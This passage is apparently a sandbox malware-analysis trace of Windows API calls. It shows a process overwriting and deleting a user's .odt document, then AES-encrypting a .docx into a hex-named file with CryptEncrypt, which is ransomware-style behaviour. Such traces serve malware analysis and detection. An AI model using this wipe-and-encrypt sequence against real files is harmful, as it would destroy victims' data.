lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.438] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.438] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.439] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.440] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.440] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.441] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.442] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.443] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.443] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.444] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.445] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.446] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.446] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.447] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.448] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x1bf5daa8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5daa8*=0xa00, lpOverlapped=0x0) returned 1 [0073.448] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.448] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.449] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.450] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.451] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.451] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.452] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.453] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.453] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.454] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.455] WriteFile (in: hFile=0x36c, lpBuffer=0x216a088*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5dad8, lpOverlapped=0x0 | out: lpBuffer=0x216a088*, lpNumberOfBytesWritten=0x1bf5dad8*=0x1000, lpOverlapped=0x0) returned 1 [0073.456] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.457] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db08*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db08*=0) returned 0x0 [0073.457] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.457] SetEndOfFile (hFile=0x36c) returned 1 [0073.458] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5db18*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5db18*=0) returned 0x0 [0073.459] CloseHandle (hObject=0x36c) returned 1 [0073.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.459] GetFileType (hFile=0x36c) returned 0x1 [0073.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.459] GetFileType (hFile=0x36c) returned 0x1 [0073.459] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.459] CloseHandle (hObject=0x36c) returned 1 [0073.459] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.459] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.459] GetFileType (hFile=0x36c) returned 0x1 [0073.459] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.459] GetFileType (hFile=0x36c) returned 0x1 [0073.459] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0073.460] CloseHandle (hObject=0x36c) returned 1 [0073.460] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0073.559] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.559] GetFileType (hFile=0x36c) returned 0x1 [0073.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0073.559] GetFileType (hFile=0x36c) returned 0x1 [0073.559] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0073.560] CloseHandle (hObject=0x36c) returned 1 [0073.560] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.560] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\e2bji.odt")) returned 1 [0073.561] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\e2BJi.odt", lpFilePart=0x0) returned 0x31 [0073.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", lpFilePart=0x0) returned 0x48 [0073.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.562] GetFileType (hFile=0x36c) returned 0x1 [0073.562] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.562] GetFileType (hFile=0x36c) returned 0x1 [0073.562] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0073.562] CloseHandle (hObject=0x36c) returned 1 [0073.562] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", lpFilePart=0x0) returned 0x48 [0073.562] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.562] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.563] GetFileType (hFile=0x36c) returned 0x1 [0073.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.563] GetFileType (hFile=0x36c) returned 0x1 [0073.563] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0073.563] CloseHandle (hObject=0x36c) returned 1 [0073.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D", lpFilePart=0x0) returned 0x48 [0073.563] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0073.563] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\096DF9EE6521AFCC89361F2D4C608B0D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\096df9ee6521afcc89361f2d4c608b0d"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.563] GetFileType (hFile=0x36c) returned 0x1 [0073.563] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0073.563] GetFileType (hFile=0x36c) returned 0x1 [0073.563] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0073.563] CloseHandle (hObject=0x36c) returned 1 [0073.563] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.564] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.565] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7e10) returned 1 [0073.565] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x216d5d0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a626ad0) returned 1 [0073.565] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.565] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.565] CryptExportKey (in: hKey=0x1a626ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x216d6c0, pdwDataLen=0x1bf5db30 | out: pbData=0x216d6c0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0073.566] CryptImportKey (in: hProv=0x1a5b7e10, pbData=0x216d7e0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626fa0) returned 1 [0073.566] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.566] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.566] CryptDuplicateKey (in: hKey=0x1a626fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626de0) returned 1 [0073.566] CryptContextAddRef (hProv=0x1a5b7e10, pdwReserved=0x0, dwFlags=0x0) returned 1 [0073.566] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x4, pbData=0x216d928*=0x1, dwFlags=0x0) returned 1 [0073.566] CryptSetKeyParam (hKey=0x1a626de0, dwParam=0x1, pbData=0x216d8d8, dwFlags=0x0) returned 1 [0073.566] CryptDestroyKey (hKey=0x1a626fa0) returned 1 [0073.566] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0073.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx", lpFilePart=0x0) returned 0x3f [0073.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\f3ppY NLfujGUnn3T_.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f3ppy nlfujgunn3t_.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.566] GetFileType (hFile=0x36c) returned 0x1 [0073.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.566] GetFileType (hFile=0x36c) returned 0x1 [0073.566] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", lpFilePart=0x0) returned 0x48 [0073.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0073.566] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x380 [0073.567] GetFileType (hFile=0x380) returned 0x1 [0073.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0073.567] GetFileType (hFile=0x380) returned 0x1 [0073.567] ReadFile (in: hFile=0x36c, lpBuffer=0x216dcf8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x216dcf8*, lpNumberOfBytesRead=0x1bf5da28*=0x14000, lpOverlapped=0x0) returned 1 [0073.568] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2181d10*, pdwDataLen=0x1bf5da80*=0x14000, dwBufLen=0x14000 | out: pbData=0x2181d10*, pdwDataLen=0x1bf5da80*=0x14000) returned 1 [0073.569] WriteFile (in: hFile=0x380, lpBuffer=0x2181d10*, nNumberOfBytesToWrite=0x14000, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2181d10*, lpNumberOfBytesWritten=0x1bf5da18*=0x14000, lpOverlapped=0x0) returned 1 [0073.571] ReadFile (in: hFile=0x36c, lpBuffer=0x216dcf8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x216dcf8*, lpNumberOfBytesRead=0x1bf5da28*=0x123f, lpOverlapped=0x0) returned 1 [0073.571] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2195d50*, pdwDataLen=0x1bf5da80*=0x1230, dwBufLen=0x1230 | out: pbData=0x2195d50*, pdwDataLen=0x1bf5da80*=0x1230) returned 1 [0073.571] WriteFile (in: hFile=0x380, lpBuffer=0x2195d50*, nNumberOfBytesToWrite=0x1230, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2195d50*, lpNumberOfBytesWritten=0x1bf5da18*=0x1230, lpOverlapped=0x0) returned 1 [0073.571] ReadFile (in: hFile=0x36c, lpBuffer=0x216dcf8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x216dcf8*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0073.571] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2196fc0*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x2196fc0*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.571] CryptEncrypt (in: hKey=0x1a626de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2197010*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x2197010*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0073.571] WriteFile (in: hFile=0x380, lpBuffer=0x2197060*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x2197060*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0073.572] CloseHandle (hObject=0x380) returned 1 [0073.573] CloseHandle (hObject=0x36c) returned 1 [0073.573] CryptDestroyKey (hKey=0x1a626ad0) returned 1 [0073.573] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0073.573] CryptReleaseContext (hProv=0x1a5b7e10, dwFlags=0x0) returned 1 [0073.573] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9", lpFilePart=0x0) returned 0x48 [0073.573] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0073.573] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\F05AD38B9C3DEDE4B5E465375377EBC9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\f05ad38b9c3dede4b5e465375377ebc9"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0073.573] GetFileType (hFile=0x36c) returned 0x1 [0073.573] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0073.574] GetFileType (hFile=0x36c) returned 0x1 [0073.574] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.575] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.576] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.577] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: hFile=0x36c, lpBuffer=0x2198758, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x2198758*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0073.578] ReadFile (in: 